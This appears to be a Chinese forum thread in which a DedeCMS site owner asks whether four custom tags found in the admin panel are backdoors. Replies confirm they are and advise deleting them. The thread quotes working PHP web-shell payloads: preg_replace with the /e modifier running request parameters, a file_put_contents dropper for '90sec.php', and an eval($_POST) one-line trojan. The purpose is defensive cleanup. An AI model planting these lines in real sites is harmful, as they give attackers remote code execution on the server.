dede后台自定义表现有4条标记是后门吗？

接到手里几个月，原本有什么标记并没有留意，前几天阿里服务器提示有后门处理了下。

刚才发现网站后台自定义标记里有这4条标记，大家帮看看是后门吗？直接删除吗？？如果删除是4条都需要删除吗？？？因为怕那一条是有用的，没敢乱删除。

1、guige, 90sec.org';@preg_replace('/[copyright]/e',$_REQUEST['laobiao'],'error');?>
2、guige, 90sec.org';@preg_replace('/[copyright]/e',$_REQUEST['guige'],'error');?>
3、{dede:php}file_put_contents('90sec.php','');{/dede:php}
4、dedecms{dede:php}eval($_POST["5202"]);{/dede:php}

90sec.php你看看这个文件的内容是什么，其他三个可以删除了

dedecms{dede:php}eval($_POST["5202"]);{/dede:php} 这个是典型的一句话木马，
{dede:php}file_put_contents('90sec.php','');{/dede:php} 这个 是包含一个文件，如果这个文件不是你的，删除掉
guige, 90sec.org';@preg_replace('/[copyright]/e',$_REQUEST['laobiao'],'error');?> 这个是替换的，应该也是别人植入的，都可以删除掉这4句话，特别是 {dede:php}eval($_POST["5202"]);{/dede:php} 这个是典型的一句话木马哦